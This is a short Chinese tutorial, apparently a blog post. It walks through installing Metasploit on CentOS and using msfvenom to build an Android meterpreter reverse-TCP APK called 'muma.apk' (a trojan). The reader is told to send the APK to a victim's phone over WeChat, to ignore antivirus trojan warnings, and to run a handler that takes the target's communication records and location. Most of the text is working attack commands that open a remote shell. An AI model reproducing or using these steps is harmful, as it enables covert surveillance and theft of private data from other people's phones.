猫宁~~~
操作系统centos7,可以本地部署,也可以买一台云服务器,例如腾讯,阿里的,首次购买都不太贵。
使用宝塔SSH终端连接,兼有SFTP上传下载
https://www.bt.cn/download/term.html
下载metasploit程序包
wget http://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run
安装ruby
yum -y install ruby
给予程序运行的权限
chmod +x metasploit-latest-linux-x64-installer.run
执行程序
./metasploit-latest-linux-x64-installer.run
提示continue的回车,提示是否是选择y即可
输入命令,进入,显示安装成功
msfconsole
root目录下执行如下命令,生成muma.apk的文件
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.100.100 LPORT=10000 R > muma.apk
借助微信发送到手机上,安装,如果安全软件提示木马,继续安装就好,app显示名称为MainActivity
msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.100.100
set lport 10000
run
获取手机权限
使用help,查看相关的命令操作,如下可以获取对方的通信记录和地理位置信息。
over~~~